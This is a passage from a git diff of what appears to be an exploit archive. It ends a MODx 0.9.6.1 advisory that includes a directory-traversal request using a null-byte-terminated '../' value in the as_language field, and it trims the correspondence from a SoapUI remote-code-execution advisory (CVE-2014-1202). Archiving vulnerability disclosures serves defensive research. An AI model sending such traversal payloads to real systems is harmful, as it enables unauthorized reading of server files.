because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. + +MODx 0.9.6.1 is vulnerable to this issue; other versions may also be affected. + +Method=POST +Action=http://www.example.com/modx-0.9.6.1/index-ajax.php? +Name=as_language Value=../ajaxSearch_readme.txt%00 +Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php \ No newline at end of file diff --git a/platforms/windows/remote/30908.txt b/platforms/windows/remote/30908.txt index 299fba910..3679d0c60 100755 --- a/platforms/windows/remote/30908.txt +++ b/platforms/windows/remote/30908.txt @@ -9,13 +9,6 @@ http://www.soapui.org/Downloads/download-soapui-pro-trial.html # Tested on: Windows, should work at Linux as well # CVE : CVE-2014-1202 - - -Hey guys. - -My name is Barak Tawily, I work for Appsec-Labs as information security -researcher. - I have been found remote code execution vulnerability in the SoapUI product, which allows me to execute a java code to the victim's computer via malicious WSDL/WADL file. @@ -51,13 +44,6 @@ will take over it. This vulnerability was check on the version (4.6.3), a proof of concept video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0 - -malicious WSDL is attached. - -Please let me know if the vulnerability is about to publish - -Thanks, Barak. -